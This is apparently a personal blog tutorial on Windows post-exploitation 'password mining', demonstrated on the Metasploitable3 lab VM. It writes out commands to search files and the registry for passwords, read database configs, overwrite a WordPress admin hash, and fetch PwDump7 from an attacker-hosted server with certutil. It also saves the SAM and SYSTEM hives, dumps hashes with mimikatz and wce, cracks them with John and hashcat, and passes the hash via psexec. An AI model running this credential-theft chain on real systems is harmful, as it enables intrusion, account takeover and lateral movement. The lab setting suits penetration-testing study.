WINDOWS PASSWORD MINING (2024)

Password mining is the process of searching for and enumerating encrypted or clear-text passwords stored in persistent or volatile memory on the target system.

I’m gonna be honest, I used to hate Windows boxes. Usually, you’re met with a Windows remote cmd shell and after exhausting all your WinPEAS, WinES, metasploit skills, you get stuck. So I decided to take time and study a bit about Windows Privilege Escalation and this is the notes I made as I studied. Over here, I’m assuming you already have a reverse cmd shell from your Windows target. Read my Pivoting and Port Forwarding post to learn how to use Metasploit to gain foothold on a Windows system.

Target machine I’m using for this demo is Metasploitable3 which is a vulnerable Windows 2k8 R2 Server.

Now that we have established a cmd on our target machine, let’s try and enumerate all text files that contain the string “password” in them.

Use command:

findstr /si password *.txt

We jump to the beginning of the local partition and run the command so that the findstr goes through all the text files located under the C: volume.

The output is large and can get overwhelming but a careful study through it would show some really sensitive info. Just like above, you can see there’s a WAMP server installed in which the password to the phpmyadmin is stored in the Documentation.txt

Other forms of the findstr command are:

findstr /si password *.xml *.ini *.txt

This will go through all .xml, .ini and .txt files for the “password” string.

findstr /si /m “password” *.xml *.ini *.conf *.txt

/m — print only the filename if the file contains the match.

The /m will limit the search results to filenames(without expanding to its contents) that only gave the search query specified.

You can perform a search for a specific string that can be found in all the files and folders

findstr /spin “password” *.* -

You can search for various strings in files by using the dir tool in cmd

dir /s *pass* == *cred* == *vnc* == *.config*

This command will list all occurence of the string specified and their locations

Cont..

See Also

Windows PWDUMP toolsHow to Extract Password Hashes using Windows & Linux OS

This automates the mass installation of Windows. This tool utilizes configuration files that contain specific configurations and user account credentials that can be used by attackers to elevate privileges.

It varies from different versions of WIndows. It’s more effective when employed against organization specific environment.

The first step involves searching for the unattended setup utility config files. The filenames vary from diff versions of windows. Some of the common names are:

- Unattended.xml
- Autounattended.xml

As said already, the location to these files too vary with each version of windows. The common locations are:

If the configuration files exist, they might contain the Administrator password either in plaintext or encoded in base64

Some known names are:

- Sysprep.inf
- Sysprep.xml

Usually located in

C:\\Windows\system32\sysprep\sysprep.xml

Windows Registry is a database that contains configs and settings for windows and other applications installed on the system. We can search the registry for specific strings to reveal user credentials. Use cmd:

reg query HKLM /f password /t REG_SZ /s

and

reg query HKCU /f password /t REG_SZ /s

To interact with a registry file, use cmd

reg query <full path to registry>

This will output all registry entries that match the password string

Here I couldn’t find anything but had the user embedded their credentials under the autologon registry config, we could have interacted with that registry file to display the credentials.

This will depend on the application type. The techniques demonstrated in this section will depend on the type of target you are dealing with and its deployment use case. In our case, our target virtual machine has been set up as a server and has various vulnerable applications installed on it.

During an nmap scan against our Windows 2008 R2 server, we found that it was running services:

- phpmyadmin
- wordpress
- mysqlserver

Let’s see how you can locate the configuration files used by these applications.

Let’s identify the web hosting stack being used by the server. Listing the contents of the root directory shows the server is running WAMP (Windows Apache, Mysql, PHP).

Run cd wamp\www to see the type of applications being hosted.

Now listing all contents

We can see wordpress in there, being hosted as an application.

WordPress is a content management system that requires a database — in this
case, MySQL — to store data and user credentials. It uses a remote connection to connect to the database and the access credentials are stored in the wp-config.php file. Let’s search for this file in the wordpress directory.

There it is

Now let’s read it’s content

use cmd command type to read files.

type wp-config.php

As you can see we have the MySQL user credentials and it happens that the database has no password protecting it.

Accessing SQL Database From the Attakcer’s machine.

Let’s log into the MySQL server remotely from our attack box. Use command:

mysql -u root -p -h <target ip>

show databases;

Select one of the DBs(wordpress in my case).

use wordpress;

Now let’s see the tables available under this DB

show Tables;

Why don’t we take a look at the wp_users table.

select * from wp_users;

Wow! This is getting exciting. The user passwords are encrypted in MD5 which is easy to crack.

Also, due to the fact that we have root access, we can change the admin password to a different one of our own choosing with command:

update wp_users set user_pass = MD5(“Password123!”) where ID = 1

You can now log into the wordpress admin panel with the credentials.

Now you have total control of MySQL and the Wordpress site.

Accessing the SQL database through the web

A simple Nmap service scan showed many HTTP services running on the Target. I tested all the ports in the browser till I got to port 8585.

I was greeted with the WAMP server homepage.

It had links to phpmyAdmin, mysql and Wordpress.

So I went with the sqlbuddy since it had SQL in its name.

I was met with an login panel. Since from the config file, the mySQL server allows no password login with the root user, I authenticated as root without a password and I was successfully logged in.

You can see the DBs lined up on the left. Let’s take a look at the wordpress DB

Taking a look at the wp_user table

On the left, there’s the Query menu which gives you a field to manually enter mySQL queries to alter the DBs. Use that to alter the admin password.

We can gain access to the control panel of phpMyAdmin by locating and reading the contents of the configuration file. The config file is located in:

C:\wamp\apps\phpmyadmin3.4.10.1\config.inc.ini.php

Let’s read it.

type config.inc.php

You can see the credentials to the phpmyadmin panel are stored in the file which also allows a passwordless login as well.

Using the link on the WAMP server homepage, we open phpmyAdmin and we are met with a login screen.

With username of root and no password, we are logged in. We should now have root access to the phpMyAdmin control panel and be able to create, modify, and delete the contents of databases.

Before I continue, let’s take a look at how Windows stores it’s Hashes.

Security Accounts Manager(SAM) is a database that manages users and their passwords on windows. Each password stored in the SAM file is hashed. Authentication and Verification of user credentials is done by the Local Security Authority (LSA).

SAM file is stored in the Windows Registry:

HKEY_LOCAL_MACHINE\SAM

Now that we’ve seen where windows hashes are stored, Let’s take a look at some password encryption types Windows employs.

LM is a weak authentication protocol that can easily be cracked, This is how it encrypts its passwords:

- The password is converted into a hash by breaking it into two seven-character chunks.
- All characters are then converted into uppercase.
- Each chunk is then encrypted with a 56-bit DES key.

This makes it weak because:

- The 56-bit DES key is weak and can be cracked relatively easily.
- Because the characters are converted into uppercase, this makes the cracking process relatively simple through a brute-force or dictionary attack.
- Versions of Windows that utilize LM are restricted to a maximum of 14 characters for user account passwords.

Let’s take a look at NTLM

NTLM was supposed to be an improvement of LM. NTLM authentication operates under the client-server model of communication and involves a handshake process, similar to the TCP three-way handshake.

NTLM operates under a challenge response system, and the hashing process can be broken down into the following steps:

- When a user account is created, it is encrypted using the MD4 hashing algorithm, while the original password is disposed of.
- During authentication, the username is sent to the server. The server then creates a 16-byte random string and sends it to the client. This is known as the challenge.
- The client encrypts the string with the password hash using the Data Encryption Standard (DES) algorithm and sends it back to the server. This is known as the response.
- The server then compares the hashed string (response) to the original. If it matches, authentication is completed.

PwDump7.exe is a binary that extracts the SAM file and dump the hashes. It needs to be ran locally on the victim’s computer. So you upload it to the victim machine and execute.

The SAM and SYSTEM file can be easily located in

C:\Users\Windows\system32\config\

Setting up a temporary Python server on my attack box, to serve the binary to the windows machine

sudo python -m SimpleHTTPServer

NB: Make sure to transfer the libeay32.dll library file along with the binary to the windows machine

Now downloading it to the windows machine

certutil.exe -f -URLcache http://<attacker ip>:8000/PwDump7.exe PwDump7.exe

Now the library file

certutil.exe -f -URLcache http://<attacker ip>:8000/libeay32.dll libeay32.dll

Now we have our two files(binary + dll file) on the target windows machine

Let’s save the SAM file to the C:\ drive

reg save hklm\sam C:\sam

Save the SYSTEM file also

reg save hklm\SYSTEM C:\system

Now run PwDump7.exe with the saved SAM file and the SYSTEM file to extract the hashes.

PwDump7.exe -s C:\sam C:\system

NB:You can run the PwDump7.exe alone to still dump the hashes without having to save the SAM file registry entries.

Samdump2 is a linux tool used to extract the hashes from a hash file.

We can save the registry value of our SAM file to our target locally with command:

reg save hklm\sam C:\sam

Now we download the saved files unto the attack box and use

Now on your attack box, run samdump2 with the SAM and SYSTEM file

This is a metasploit command that dumps all users and their hashes if executed with the right permissions.

wce.exe (comes prepackaged with Kali) is a windows binary that list the logon sessions and their corresponding NTLM hashes.

From our attack box, let’s serve the binary for download.

Now let’s download it to the windows target

Now you run it

With this, you’re only able to dump the hashes of currently logged on users.

You can also dump the plain-text of the hashes with wce with the command:

wce64.exe -w

Use post/windows/gather/credentials/credential_collector

set session to your current active session and run

We can talk about dumping credentials without talking Mimikatz. It’s a credential dumping tool when executed with the right privileges. It’s not limited to credential dumping only as it has other useful purposes such as token impersonation.

Even though we can load it from its metasploit module, I’m choosing to go the long way of manually uploading it and executing it.

It also comes prepackaged with Kali (located in /usr/share/windows-resources/mimikatz directory) so I’m going to host the entire x64 binary folder together with its dependencies for download.

Downloading on the windows machine

Now run mimikatz.exe on the target machine

Run token::elevate to elevate your permissions since you need high permissions to access the SAM file.

Now dump the SAM file hashes with command lsadump::sam

We have been able to dump the user account hashes, aside wce64.exe which was able to dump the plaintext format of the logged on users passwords, the other tools could only dump the hashes. In this section, I’m going to demonstrate how you can utilize some Open source tools to crack these hashes.

Structure of a typical windows Hash

<username>:<RID>:<LM>:<NTLM>

It’s an open source password security, auditing, and recovery utility that supports a large number of hashes and ciphers. We will start by saving all our password hashes into a txt file I’ll call hashes.txt

The content of hashes.txt should be similar to this

Now we run John the ripper with the command:

sudo john — format=NT hashes.txt

This will run with John’s default password wordlist. You can specify your own wordlist with the — wordlist tag)

It starts to crack the password hashes one after the other. Depending on the list of hashes and the complexity of the hashes, John can take longer hours(or days even) to crack the hashes. So it’s better to always limit it to the hashes of interest only.

Another password cracking tool which is my favorite actually. With the same hashes.txt, run it with hashcat together with the rockyou wordlist.

hashcat -a 0 -m 1000 hashes.txt <wordlist>

• -m=This is the mode of the hash. NTLM hashes have a mode of 1000
• -a= This means attack mode. And 0 means Straight attack, meaning just crosscheck with each word in the wordlist as it is without any complex combinations.

Now what can you do with these set of credentials after cracking them?

Here, I’m going to show you how you can use the newly found credentials to authenticate against the target to obtain privileged access. There are various techniques but I’m going to highlight a few ways.

Let’s say you’re finding it difficult to crack the hash, you can authenticate with the target using the dumped hashes without knowing the plain-text form. I’ll be utilizing one of impackets tools called Psexec

Psexec is a tool used to authenticate to windows machines, can be used to pass the hash too.

It has a module embedded in metasploit.

use exploit/windows/smb/psexec

Set the required options (SMBUser, SMBPass(hash), RHOSTS most importantly)

Now you get a meterpreter session as the Adminstrator.

John cracked the hash of Administrator as ‘vagrant’. Let’s try to see if RDP is enabled on the windows target and if so, can we authenticate.

RDP runs on port 3389. An nmap scan revealed port 3389 to be open

xfreerdp /u:<username> /p:<password> /cert:ignore /v:<taget ip> /dynamic-resolution

We successfully RDP’d into the target with the admin credentials. We have control of the Domain.

If the target has any form of ssh server installed on it, you can SSH into it with any valid pair of credentials. From hashcat, we saw that the password of c_three_pio was pr0t0c0l. Let’s see if we can SSH into the system.

ssh <username>@<target ip>

After typing the password, we get a cmd shell

I got most of the knowledge from this post by purchasing and reading Hackersploit’s Privilege Escalation Techniques book. You can purchase it from his website or by clicking here. If you have any questions you can DM me on Twitter @tinopreter.